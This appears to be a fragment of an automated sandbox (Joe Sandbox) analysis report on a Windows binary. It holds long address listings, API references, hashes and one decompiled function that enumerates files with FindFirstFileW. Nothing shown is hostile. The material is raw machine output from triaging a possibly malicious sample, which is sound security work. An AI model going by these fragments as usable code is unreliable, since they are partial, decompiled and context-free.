                                                                                                                    0x00b5429a
                                                                                                                    0x00b5429c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b542a5
                                                                                                                    0x00b542a9
                                                                                                                    0x00b542ac
                                                                                                                    0x00b542b2
                                                                                                                    0x00b542b5
                                                                                                                    0x00b542b8
                                                                                                                    0x00b542bb
                                                                                                                    0x00b5470f
                                                                                                                    0x00b5470f
                                                                                                                    0x00b54712
                                                                                                                    0x00b54717
                                                                                                                    0x00b5471e
                                                                                                                    0x00b5471e
                                                                                                                    0x00b54724
                                                                                                                    0x00b54724
                                                                                                                    0x00b54727
                                                                                                                    0x00b5472a
                                                                                                                    0x00b5472d
                                                                                                                    0x00b54730
                                                                                                                    0x00b54732
                                                                                                                    0x00b54736
                                                                                                                    0x00b5473c
                                                                                                                    0x00b5473f
                                                                                                                    0x00b54741
                                                                                                                    0x00b54745
                                                                                                                    0x00b547fa
                                                                                                                    0x00b547fa
                                                                                                                    0x00b5474b
                                                                                                                    0x00b5474d
                                                                                                                    0x00b5474d
                                                                                                                    0x00b547fc
                                                                                                                    0x00b547fe
                                                                                                                    0x00b54801
                                                                                                                    0x00b54805
                                                                                                                    0x00b54808
                                                                                                                    0x00b5480d
                                                                                                                    0x00b5480d
                                                                                                                    0x00b54813
                                                                                                                    0x00b54817
                                                                                                                    0x00b5481a
                                                                                                                    0x00b5481e
                                                                                                                    0x00b54821
                                                                                                                    0x00b54824
                                                                                                                    0x00b54875
                                                                                                                    0x00b54875
                                                                                                                    0x00b54879
                                                                                                                    0x00b5487d
                                                                                                                    0x00b549d4
                                                                                                                    0x00b549d4
                                                                                                                    0x00b549d7
                                                                                                                    0x00b549d9
                                                                                                                    0x00b549db
                                                                                                                    0x00b549dd
                                                                                                                    0x00b549e0
                                                                                                                    0x00b549e7
                                                                                                                    0x00b549e9
                                                                                                                    0x00b549eb
                                                                                                                    0x00b549eb
                                                                                                                    0x00b549ed
                                                                                                                    0x00b549ed
                                                                                                                    0x00b549f0
                                                                                                                    0x00b549f6
                                                                                                                    0x00b549f9
                                                                                                                    0x00b549f9
                                                                                                                    0x00b549fc
                                                                                                                    0x00b549fe
                                                                                                                    0x00b54a02
                                                                                                                    0x00b54a04
                                                                                                                    0x00b54a16
                                                                                                                    0x00b54a16
                                                                                                                    0x00b54a19
                                                                                                                    0x00b54a1b
                                                                                                                    0x00b54b1d
                                                                                                                    0x00b54b26
                                                                                                                    0x00b54b2d
                                                                                                                    0x00b54b2f
                                                                                                                    0x00000000
                                                                                                                    0x00b54b34
                                                                                                                    0x00b54a21
                                                                                                                    0x00b54a25
                                                                                                                    0x00b54a29
                                                                                                                    0x00b54a2d
                                                                                                                    0x00b54a35
                                                                                                                    0x00b54a38
                                                                                                                    0x00b54a3d
                                                                                                                    0x00b54a3f
                                                                                                                    0x00b54a41
                                                                                                                    0x00b54a43
                                                                                                                    0x00b54a49
                                                                                                                    0x00b54a4c
                                                                                                                    0x00b54a4e
                                                                                                                    0x00b54a52
                                                                                                                    0x00b54a8b
                                                                                                                    0x00b54a8b
                                                                                                                    0x00b54a54
                                                                                                                    0x00b54a59
                                                                                                                    0x00b54a59
                                                                                                                    0x00b54a91
                                                                                                                    0x00b54a95
                                                                                                                    0x00b54a95
                                                                                                                    0x00b54a3f
                                                                                                                    0x00b54a9a
                                                                                                                    0x00b54a9d
                                                                                                                    0x00b54aa0
                                                                                                                    0x00b54aa2
                                                                                                                    0x00b54aa4
                                                                                                                    0x00b54aa4
                                                                                                                    0x00b54abb
                                                                                                                    0x00b54abd
                                                                                                                    0x00b54ac0
                                                                                                                    0x00b54ac2
                                                                                                                    0x00b54ac6
                                                                                                                    0x00b54acb
                                                                                                                    0x00b54acb
                                                                                                                    0x00b54acf
                                                                                                                    0x00b54ad4
                                                                                                                    0x00b54ad8
                                                                                                                    0x00b54ada
                                                                                                                    0x00b54ade
                                                                                                                    0x00b54ae3
                                                                                                                    0x00b54ae3
                                                                                                                    0x00b54ae9
                                                                                                                    0x00b54aed
                                                                                                                    0x00b54af8
                                                                                                                    0x00b54afc
                                                                                                                    0x00b54b08
                                                                                                                    0x00b54b0d
                                                                                                                    0x00b54b14
                                                                                                                    0x00b54b19
                                                                                                                    0x00000000
                                                                                                                    0x00b54a06
                                                                                                                    0x00b54a06
                                                                                                                    0x00b54a0e
                                                                                                                    0x00b54a11
                                                                                                                    0x00b54a12
                                                                                                                    0x00b54a12
                                                                                                                    0x00000000
                                                                                                                    0x00b54a06
                                                                                                                    0x00b54a04
                                                                                                                    0x00b54883
                                                                                                                    0x00b54886
                                                                                                                    0x00b54886
                                                                                                                    0x00b5488c
                                                                                                                    0x00b5488f
                                                                                                                    0x00b54892
                                                                                                                    0x00b54896
                                                                                                                    0x00b54899
                                                                                                                    0x00b5489d
                                                                                                                    0x00b548c8
                                                                                                                    0x00b548cc
                                                                                                                    0x00b548ce
                                                                                                                    0x00b54912
                                                                                                                    0x00b54917
                                                                                                                    0x00b5491a
                                                                                                                    0x00b5492f
                                                                                                                    0x00b5492f
                                                                                                                    0x00b5492f
                                                                                                                    0x00b5491c
                                                                                                                    0x00b5491c
                                                                                                                    0x00b54920
                                                                                                                    0x00b54924
                                                                                                                    0x00b5492a
                                                                                                                    0x00b5492a
                                                                                                                    0x00b54939
                                                                                                                    0x00b54944
                                                                                                                    0x00b54947
                                                                                                                    0x00b5494c
                                                                                                                    0x00b5494f
                                                                                                                    0x00b548d0
                                                                                                                    0x00b548d0
                                                                                                                    0x00b548d5
                                                                                                                    0x00b548d8
                                                                                                                    0x00b548ed
                                                                                                                    0x00b548ed
                                                                                                                    0x00b548ed
                                                                                                                    0x00b548da
                                                                                                                    0x00b548da
                                                                                                                    0x00b548de
                                                                                                                    0x00b548e2
                                                                                                                    0x00b548e8
                                                                                                                    0x00b548e8
                                                                                                                    0x00b548f7
                                                                                                                    0x00b54902
                                                                                                                    0x00b54905
                                                                                                                    0x00b5490a
                                                                                                                    0x00b5490d
                                                                                                                    0x00b5490d
                                                                                                                    0x00b54952
                                                                                                                    0x00b54955
                                                                                                                    0x00b54958
                                                                                                                    0x00000000
                                                                                                                    0x00b54958
                                                                                                                    0x00b5489f
                                                                                                                    0x00b548ae
                                                                                                                    0x00b548b0
                                                                                                                    0x00b548b2
                                                                                                                    0x00b54a60
                                                                                                                    0x00b54a63
                                                                                                                    0x00b54a67
                                                                                                                    0x00b54a69
                                                                                                                    0x00b54a6e
                                                                                                                    0x00b54a6e
                                                                                                                    0x00b54a71
                                                                                                                    0x00b54a74
                                                                                                                    0x00b54a78
                                                                                                                    0x00b54a7a
                                                                                                                    0x00b54a83
                                                                                                                    0x00b54a83
                                                                                                                    0x00000000
                                                                                                                    0x00b54a7a
                                                                                                                    0x00b548be
                                                                                                                    0x00b5495b
                                                                                                                    0x00b5495b
                                                                                                                    0x00b5495d
                                                                                                                    0x00b54965
                                                                                                                    0x00b54967
                                                                                                                    0x00b54979
                                                                                                                    0x00b54979
                                                                                                                    0x00b54969
                                                                                                                    0x00b54969
                                                                                                                    0x00b5496c
                                                                                                                    0x00b5496f
                                                                                                                    0x00b54975
                                                                                                                    0x00b54975
                                                                                                                    0x00b54986
                                                                                                                    0x00b5498e
                                                                                                                    0x00b54991
                                                                                                                    0x00b5499e
                                                                                                                    0x00b549a2
                                                                                                                    0x00b549a5
                                                                                                                    0x00b549a9
                                                                                                                    0x00b549ac
                                                                                                                    0x00b549af
                                                                                                                    0x00b549b2
                                                                                                                    0x00b549b5
                                                                                                                    0x00b549b8
                                                                                                                    0x00b549ba
                                                                                                                    0x00b549bf
                                                                                                                    0x00b549bf
                                                                                                                    0x00b549c2
                                                                                                                    0x00b549c5
                                                                                                                    0x00b549cb
                                                                                                                    0x00b549cb
                                                                                                                    0x00000000
                                                                                                                    0x00b54826
                                                                                                                    0x00b5482f
                                                                                                                    0x00b5483c
                                                                                                                    0x00b54845
                                                                                                                    0x00b54847
                                                                                                                    0x00b54849
                                                                                                                    0x00b54b35
                                                                                                                    0x00b54b35
                                                                                                                    0x00b54b38
                                                                                                                    0x00b54b3c
                                                                                                                    0x00b54b3e
                                                                                                                    0x00b54b43
                                                                                                                    0x00b54b43
                                                                                                                    0x00b54b46
                                                                                                                    0x00b54b48
                                                                                                                    0x00b54b4b
                                                                                                                    0x00b54b4f
                                                                                                                    0x00000000
                                                                                                                    0x00b54b4f
                                                                                                                    0x00b54856
                                                                                                                    0x00b5485b
                                                                                                                    0x00b5485d
                                                                                                                    0x00b54868
                                                                                                                    0x00b5486d
                                                                                                                    0x00b5486f
                                                                                                                    0x00b54871
                                                                                                                    0x00b54871
                                                                                                                    0x00b5486f
                                                                                                                    0x00000000
                                                                                                                    0x00b5485d
                                                                                                                    0x00b54824
                                                                                                                    0x00b542c1
                                                                                                                    0x00b542c1
                                                                                                                    0x00b542c4
                                                                                                                    0x00b542c7
                                                                                                                    0x00b542ca
                                                                                                                    0x00b542d8
                                                                                                                    0x00b542e0
                                                                                                                    0x00b542e3
                                                                                                                    0x00b542e5
                                                                                                                    0x00b542e7
                                                                                                                    0x00b542e9
                                                                                                                    0x00b542eb
                                                                                                                    0x00b542eb
                                                                                                                    0x00b542ee
                                                                                                                    0x00b542f2
                                                                                                                    0x00b542f5
                                                                                                                    0x00b5438e
                                                                                                                    0x00b5438e
                                                                                                                    0x00b5439e
                                                                                                                    0x00b543a2
                                                                                                                    0x00b543a7
                                                                                                                    0x00b543aa
                                                                                                                    0x00b543ac
                                                                                                                    0x00b54769
                                                                                                                    0x00b5476c
                                                                                                                    0x00b5477f
                                                                                                                    0x00b5477f
                                                                                                                    0x00b54781
                                                                                                                    0x00b54786
                                                                                                                    0x00b54786
                                                                                                                    0x00000000
                                                                                                                    0x00b54781
                                                                                                                    0x00b543b2
                                                                                                                    0x00b543b5
                                                                                                                    0x00b543b7
                                                                                                                    0x00b5445a
                                                                                                                    0x00b5445c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b54462
                                                                                                                    0x00b54462
                                                                                                                    0x00b54464
                                                                                                                    0x00b54468
                                                                                                                    0x00b5446d
                                                                                                                    0x00b5446d
                                                                                                                    0x00b54470
                                                                                                                    0x00b54480
                                                                                                                    0x00b54484
                                                                                                                    0x00b54486
                                                                                                                    0x00b54489
                                                                                                                    0x00b5448b
                                                                                                                    0x00b5455c
                                                                                                                    0x00b5455c
                                                                                                                    0x00b5455e
                                                                                                                    0x00b54562
                                                                                                                    0x00b54567
                                                                                                                    0x00b54567
                                                                                                                    0x00b5456a
                                                                                                                    0x00b5456e
                                                                                                                    0x00b5457e
                                                                                                                    0x00b54582
                                                                                                                    0x00b54584
                                                                                                                    0x00b54587
                                                                                                                    0x00b54589
                                                                                                                    0x00b545ac
                                                                                                                    0x00b545ac
                                                                                                                    0x00b545ae
                                                                                                                    0x00b545b2
                                                                                                                    0x00b545b7
                                                                                                                    0x00b545b7
                                                                                                                    0x00b545bf
                                                                                                                    0x00b545c2
                                                                                                                    0x00b545c5
                                                                                                                    0x00b545c7
                                                                                                                    0x00b545ca
                                                                                                                    0x00b545cc
                                                                                                                    0x00b545d1
                                                                                                                    0x00b545d3
                                                                                                                    0x00b545d5
                                                                                                                    0x00b545d5
                                                                                                                    0x00b545d7
                                                                                                                    0x00b545d7
                                                                                                                    0x00b545da
                                                                                                                    0x00b545e1
                                                                                                                    0x00b545e1
                                                                                                                    0x00b545e4
                                                                                                                    0x00b545e6
                                                                                                                    0x00b545ea
                                                                                                                    0x00b545ed
                                                                                                                    0x00b545ef
                                                                                                                    0x00b545f4
                                                                                                                    0x00b545f6
                                                                                                                    0x00b545f8
                                                                                                                    0x00b545f8
                                                                                                                    0x00b545fa
                                                                                                                    0x00b545fa
                                                                                                                    0x00b545fd
                                                                                                                    0x00b54604
                                                                                                                    0x00b54604
                                                                                                                    0x00b54607
                                                                                                                    0x00b54609
                                                                                                                    0x00b5460d
                                                                                                                    0x00b54610
                                                                                                                    0x00b546ae
                                                                                                                    0x00b546ae
                                                                                                                    0x00b546b1
                                                                                                                    0x00b546b3
                                                                                                                    0x00b546c0
                                                                                                                    0x00b546c9
                                                                                                                    0x00b546c9
                                                                                                                    0x00000000
                                                                                                                    0x00b546c9
                                                                                                                    0x00b546b8
                                                                                                                    0x00b546be
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b54616
                                                                                                                    0x00b54616
                                                                                                                    0x00b54619
                                                                                                                    0x00b5461c
                                                                                                                    0x00b5461c
                                                                                                                    0x00b5461f
                                                                                                                    0x00b54621
                                                                                                                    0x00b54624
                                                                                                                    0x00b5463b
                                                                                                                    0x00b5463b
                                                                                                                    0x00b5463b
                                                                                                                    0x00b5463e
                                                                                                                    0x00b5463e
                                                                                                                    0x00b54640
                                                                                                                    0x00b5465b
                                                                                                                    0x00b5465d
                                                                                                                    0x00b54660
                                                                                                                    0x00b54675
                                                                                                                    0x00b54675
                                                                                                                    0x00b54675
                                                                                                                    0x00b54678
                                                                                                                    0x00b54678
                                                                                                                    0x00b5467a
                                                                                                                    0x00b547f1
                                                                                                                    0x00000000
                                                                                                                    0x00b547f7
                                                                                                                    0x00b54688
                                                                                                                    0x00b54688
                                                                                                                    0x00b5468b
                                                                                                                    0x00b5468f
                                                                                                                    0x00b54691
                                                                                                                    0x00b54694
                                                                                                                    0x00000000
                                                                                                                    0x00b54694
                                                                                                                    0x00b54662
                                                                                                                    0x00b54665
                                                                                                                    0x00b54668
                                                                                                                    0x00b5466a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5466c
                                                                                                                    0x00b5466d
                                                                                                                    0x00b54670
                                                                                                                    0x00b54673
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b54673
                                                                                                                    0x00000000
                                                                                                                    0x00b54665
                                                                                                                    0x00b54652
                                                                                                                    0x00000000
                                                                                                                    0x00b54652
                                                                                                                    0x00b54626
                                                                                                                    0x00b54628
                                                                                                                    0x00b5462a
                                                                                                                    0x00b5462d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5462f
                                                                                                                    0x00b54630
                                                                                                                    0x00b54633
                                                                                                                    0x00b54636
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b54638
                                                                                                                    0x00000000
                                                                                                                    0x00b54638
                                                                                                                    0x00b54656
                                                                                                                    0x00000000
                                                                                                                    0x00b54696
                                                                                                                    0x00b54696
                                                                                                                    0x00b54699
                                                                                                                    0x00b5469f
                                                                                                                    0x00b546a2
                                                                                                                    0x00b546a5
                                                                                                                    0x00b546a5
                                                                                                                    0x00000000
                                                                                                                    0x00b5461c
                                                                                                                    0x00b5458b
                                                                                                                    0x00b5458b
                                                                                                                    0x00b54592
                                                                                                                    0x00b54595
                                                                                                                    0x00b5459f
                                                                                                                    0x00b545a1
                                                                                                                    0x00b545a3
                                                                                                                    0x00b547cc
                                                                                                                    0x00b547cf
                                                                                                                    0x00000000
                                                                                                                    0x00b547cf
                                                                                                                    0x00b545a9
                                                                                                                    0x00000000
                                                                                                                    0x00b545a9
                                                                                                                    0x00b54491
                                                                                                                    0x00b54494
                                                                                                                    0x00b54497
                                                                                                                    0x00b5449a
                                                                                                                    0x00b5449c
                                                                                                                    0x00b5477b
                                                                                                                    0x00000000
                                                                                                                    0x00b5477b
                                                                                                                    0x00b544a2
                                                                                                                    0x00b544ad
                                                                                                                    0x00b544b4
                                                                                                                    0x00b544b6
                                                                                                                    0x00b544b8
                                                                                                                    0x00b54793
                                                                                                                    0x00b547b2
                                                                                                                    0x00b547b5
                                                                                                                    0x00b547bd
                                                                                                                    0x00b547c3
                                                                                                                    0x00b547c6
                                                                                                                    0x00000000
                                                                                                                    0x00b547c6
                                                                                                                    0x00b544c1
                                                                                                                    0x00b544c6
                                                                                                                    0x00b544c9
                                                                                                                    0x00b544ce
                                                                                                                    0x00b544d1
                                                                                                                    0x00b544d8
                                                                                                                    0x00b544dd
                                                                                                                    0x00b544dd
                                                                                                                    0x00b544e7
                                                                                                                    0x00b544ec
                                                                                                                    0x00b544ee
                                                                                                                    0x00b544f2
                                                                                                                    0x00b544f4
                                                                                                                    0x00b54513
                                                                                                                    0x00b54516
                                                                                                                    0x00b54522
                                                                                                                    0x00b54524
                                                                                                                    0x00b54526
                                                                                                                    0x00b5479c
                                                                                                                    0x00b547a8
                                                                                                                    0x00b547ae
                                                                                                                    0x00000000
                                                                                                                    0x00b547ae
                                                                                                                    0x00b5452f
                                                                                                                    0x00b5453b
                                                                                                                    0x00b54544
                                                                                                                    0x00b54548
                                                                                                                    0x00b54550
                                                                                                                    0x00b54556
                                                                                                                    0x00b54559
                                                                                                                    0x00000000
                                                                                                                    0x00b544f6
                                                                                                                    0x00b544f6
                                                                                                                    0x00b544fc
                                                                                                                    0x00b54500
                                                                                                                    0x00b5450a
                                                                                                                    0x00b5450e
                                                                                                                    0x00b5450f
                                                                                                                    0x00b5450f
                                                                                                                    0x00000000
                                                                                                                    0x00b544f6
                                                                                                                    0x00b544f4
                                                                                                                    0x00b5448b
                                                                                                                    0x00b543cb
                                                                                                                    0x00b543cd
                                                                                                                    0x00b543d3
                                                                                                                    0x00b543d5
                                                                                                                    0x00b543d5
                                                                                                                    0x00b543da
                                                                                                                    0x00b543dc
                                                                                                                    0x00b54772
                                                                                                                    0x00b54775
                                                                                                                    0x00000000
                                                                                                                    0x00b543e2
                                                                                                                    0x00b543e2
                                                                                                                    0x00000000
                                                                                                                    0x00b543e2
                                                                                                                    0x00b542fb
                                                                                                                    0x00b542fb
                                                                                                                    0x00b542ff
                                                                                                                    0x00b54346
                                                                                                                    0x00b54346
                                                                                                                    0x00b54356
                                                                                                                    0x00b5435a
                                                                                                                    0x00b5435c
                                                                                                                    0x00b5435f
                                                                                                                    0x00b54361
                                                                                                                    0x00b54380
                                                                                                                    0x00b54380
                                                                                                                    0x00b54382
                                                                                                                    0x00b54386
                                                                                                                    0x00b5438b
                                                                                                                    0x00b5438b
                                                                                                                    0x00000000
                                                                                                                    0x00b54386
                                                                                                                    0x00b54368
                                                                                                                    0x00b54373
                                                                                                                    0x00b54375
                                                                                                                    0x00b54377
                                                                                                                    0x00b54760
                                                                                                                    0x00b54763
                                                                                                                    0x00b547d3
                                                                                                                    0x00b547d3
                                                                                                                    0x00b547d5
                                                                                                                    0x00b547de
                                                                                                                    0x00b547de
                                                                                                                    0x00000000
                                                                                                                    0x00b547d5
                                                                                                                    0x00b5437d
                                                                                                                    0x00000000
                                                                                                                    0x00b5437d
                                                                                                                    0x00b54301
                                                                                                                    0x00b54311
                                                                                                                    0x00b54315
                                                                                                                    0x00b54317
                                                                                                                    0x00b5431a
                                                                                                                    0x00b5431c
                                                                                                                    0x00b54338
                                                                                                                    0x00b54338
                                                                                                                    0x00b5433a
                                                                                                                    0x00b5433e
                                                                                                                    0x00b54343
                                                                                                                    0x00b54343
                                                                                                                    0x00000000
                                                                                                                    0x00b5433e
                                                                                                                    0x00b54323
                                                                                                                    0x00b5432b
                                                                                                                    0x00b5432d
                                                                                                                    0x00b5432f
                                                                                                                    0x00b54757
                                                                                                                    0x00b5475a
                                                                                                                    0x00000000
                                                                                                                    0x00b5475a
                                                                                                                    0x00b54335
                                                                                                                    0x00000000
                                                                                                                    0x00b54335
                                                                                                                    0x00b546cb
                                                                                                                    0x00b546d7
                                                                                                                    0x00b546e3
                                                                                                                    0x00b546eb
                                                                                                                    0x00b546ef
                                                                                                                    0x00b546f4
                                                                                                                    0x00b546f7
                                                                                                                    0x00b546fe
                                                                                                                    0x00b54702
                                                                                                                    0x00b54706
                                                                                                                    0x00b5470d
                                                                                                                    0x00b5470d
                                                                                                                    0x00000000
                                                                                                                    0x00b541c0
                                                                                                                    0x00b541c0
                                                                                                                    0x00b541c0
                                                                                                                    0x00b541c0
                                                                                                                    0x00b541d7
                                                                                                                    0x00b541d7
                                                                                                                    0x00b541d9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b541df
                                                                                                                    0x00b541df
                                                                                                                    0x00b541e3
                                                                                                                    0x00b541e7
                                                                                                                    0x00b541ef
                                                                                                                    0x00b541f3
                                                                                                                    0x00b541f5
                                                                                                                    0x00b541fa
                                                                                                                    0x00b541fc
                                                                                                                    0x00b543e7
                                                                                                                    0x00b543eb
                                                                                                                    0x00b543f8
                                                                                                                    0x00b543fb
                                                                                                                    0x00b54403
                                                                                                                    0x00b54407
                                                                                                                    0x00000000
                                                                                                                    0x00b54407
                                                                                                                    0x00b54202
                                                                                                                    0x00b54205
                                                                                                                    0x00b54208
                                                                                                                    0x00b54215
                                                                                                                    0x00b54219
                                                                                                                    0x00b54411
                                                                                                                    0x00b54414
                                                                                                                    0x00b54418
                                                                                                                    0x00b54420
                                                                                                                    0x00b54424
                                                                                                                    0x00b5442f
                                                                                                                    0x00b54433
                                                                                                                    0x00b5443f
                                                                                                                    0x00b54444
                                                                                                                    0x00b5444b
                                                                                                                    0x00b54450
                                                                                                                    0x00000000
                                                                                                                    0x00b54450
                                                                                                                    0x00b5421f
                                                                                                                    0x00b54222
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b54228
                                                                                                                    0x00b5422b
                                                                                                                    0x00b54234
                                                                                                                    0x00b5423a
                                                                                                                    0x00b5423e
                                                                                                                    0x00b54246
                                                                                                                    0x00b5424a
                                                                                                                    0x00b5424f
                                                                                                                    0x00b54255
                                                                                                                    0x00b54258
                                                                                                                    0x00b5425b
                                                                                                                    0x00b541c2
                                                                                                                    0x00b541c2
                                                                                                                    0x00b541c5
                                                                                                                    0x00b541cb
                                                                                                                    0x00b541ce
                                                                                                                    0x00b541d0
                                                                                                                    0x00b541d5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b54261
                                                                                                                    0x00b54261
                                                                                                                    0x00000000
                                                                                                                    0x00b54261
                                                                                                                    0x00b5425b
                                                                                                                    0x00b5420a
                                                                                                                    0x00b5420d
                                                                                                                    0x00b543ef
                                                                                                                    0x00b543f3
                                                                                                                    0x00000000
                                                                                                                    0x00b54213
                                                                                                                    0x00000000
                                                                                                                    0x00b54213
                                                                                                                    0x00b5420d
                                                                                                                    0x00b541ab
                                                                                                                    0x00b541ab
                                                                                                                    0x00b541ab
                                                                                                                    0x00000000
                                                                                                                    0x00b541ab
                                                                                                                    0x00b541a9
                                                                                                                    0x00b540da
                                                                                                                    0x00b540e3
                                                                                                                    0x00b540e8
                                                                                                                    0x00b540ea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b540ea
                                                                                                                    0x00b540a4
                                                                                                                    0x00b540a7
                                                                                                                    0x00b540a9
                                                                                                                    0x00b540ac
                                                                                                                    0x00b540ae
                                                                                                                    0x00b540c0
                                                                                                                    0x00b540c2
                                                                                                                    0x00b540c2
                                                                                                                    0x00b540ce
                                                                                                                    0x00b540ce
                                                                                                                    0x00b540ce
                                                                                                                    0x00b540ce
                                                                                                                    0x00000000
                                                                                                                    0x00b540ce
                                                                                                                    0x00b540c4
                                                                                                                    0x00b540c6
                                                                                                                    0x00000000
                                                                                                                    0x00b540c8
                                                                                                                    0x00b540c8
                                                                                                                    0x00000000
                                                                                                                    0x00b540c8
                                                                                                                    0x00b540c6
                                                                                                                    0x00b540b0
                                                                                                                    0x00b540b6
                                                                                                                    0x00b540b6
                                                                                                                    0x00000000
                                                                                                                    0x00b540b6
                                                                                                                    0x00b540b2
                                                                                                                    0x00b540b4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b54037
                                                                                                                    0x00b54037
                                                                                                                    0x00b54b6f
                                                                                                                    0x00b54b6f
                                                                                                                    0x00b54b76
                                                                                                                    0x00b54b7b
                                                                                                                    0x00b54b7d
                                                                                                                    0x00b54b83
                                                                                                                    0x00b54b8b
                                                                                                                    0x00b54b8b

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B53FDA
                                                                                                                      • Part of subcall function 00B5B693: _CxxThrowException.MSVCRT(?,00B8FFC8), ref: 00B5B6DC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionH_prologThrow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 461045715-3916222277
                                                                                                                    • Opcode ID: ca513f38ce5c8d8bb86b4fe1c832b4910c01c8a34e177bd0536ffdb9c4c36214
                                                                                                                    • Instruction ID: f4e9ebc720e15f0a6606e010eafea6ed498c5ca8e0e010b37b8ad2213ce7da40
                                                                                                                    • Opcode Fuzzy Hash: ca513f38ce5c8d8bb86b4fe1c832b4910c01c8a34e177bd0536ffdb9c4c36214
                                                                                                                    • Instruction Fuzzy Hash: 13927C31900249DFDB15DFA8C884BAEBBF1EF09309F2441D9E815AB291D771EE89CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B165A1 Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B165A1(void* __ebx, void** __ecx, void* __edi, void* __eflags) {
				void* _t22;
				signed int _t25;
				void* _t31;
				void* _t33;
				void** _t48;
				void* _t50;

				L00B7F140(E00B82E98, _t50);
				_t48 = __ecx;
				if(E00B16581(__ecx) == 0) {
					L9:
					_t22 = 0;
				} else {
					_t33 = E00B18760( *(_t50 + 8));
					if(_t33 != 1) {
						_t2 = _t50 - 0x268; // -616
						_t31 = FindFirstFileW( *(_t50 + 8), _t2); // executed
						 *_t48 = _t31;
					}
					if( *_t48 == 0xffffffff && _t33 != 0) {
						_t4 = _t50 - 0x18; // -24
						_t25 = E00B12D90(_t4);
						 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
						_t8 = _t50 - 0x18; // -24
						if(E00B18869( *(_t50 + 8), _t8, _t50, _t25 & 0xffffff00 | _t33 != 0x00000001) != 0) {
							_t11 = _t50 - 0x268; // -616
							_t27 = FindFirstFileW( *(_t50 - 0x18), _t11); // executed
							 *_t48 = _t27;
						}
						 *(_t50 - 4) =  *(_t50 - 4) | 0xffffffff;
						E00B11E89(_t27,  *(_t50 - 0x18));
					}
					if( *_t48 != 0xffffffff) {
						_t17 = _t50 - 0x268; // -616
						E00B16652(_t17,  *((intOrPtr*)(_t50 + 0xc)), __eflags);
						_t22 = 1;
					} else {
						goto L9;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
				return _t22;
			}









                                                                                                                    0x00b165a6
                                                                                                                    0x00b165b2
                                                                                                                    0x00b165bb
                                                                                                                    0x00b1662f
                                                                                                                    0x00b1662f
                                                                                                                    0x00b165bd
                                                                                                                    0x00b165cd
                                                                                                                    0x00b165d2
                                                                                                                    0x00b165d4
                                                                                                                    0x00b165de
                                                                                                                    0x00b165e0
                                                                                                                    0x00b165e0
                                                                                                                    0x00b165e5
                                                                                                                    0x00b165eb
                                                                                                                    0x00b165ee
                                                                                                                    0x00b165f3
                                                                                                                    0x00b165fd
                                                                                                                    0x00b1660b
                                                                                                                    0x00b1660d
                                                                                                                    0x00b16617
                                                                                                                    0x00b16619
                                                                                                                    0x00b16619
                                                                                                                    0x00b1661e
                                                                                                                    0x00b16622
                                                                                                                    0x00b16627
                                                                                                                    0x00b1662d
                                                                                                                    0x00b16636
                                                                                                                    0x00b1663c
                                                                                                                    0x00b16641
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1662d
                                                                                                                    0x00b16647
                                                                                                                    0x00b1664f

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B165A6
                                                                                                                      • Part of subcall function 00B16581: FindClose.KERNELBASE(00000000,?,00B165B9), ref: 00B1658C
                                                                                                                    • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 00B165DE
                                                                                                                    • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 00B16617
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
